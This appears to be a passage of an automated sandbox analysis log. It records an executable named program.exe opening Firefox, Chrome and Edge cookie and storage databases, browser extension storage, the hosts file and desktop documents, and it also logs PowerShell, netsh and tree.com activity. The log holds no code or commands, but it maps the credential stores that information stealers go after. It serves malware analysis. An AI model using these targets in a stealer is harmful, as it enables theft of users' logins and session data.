              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\BPMLNOBVSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\CURQNKVOIX.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.pdf VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
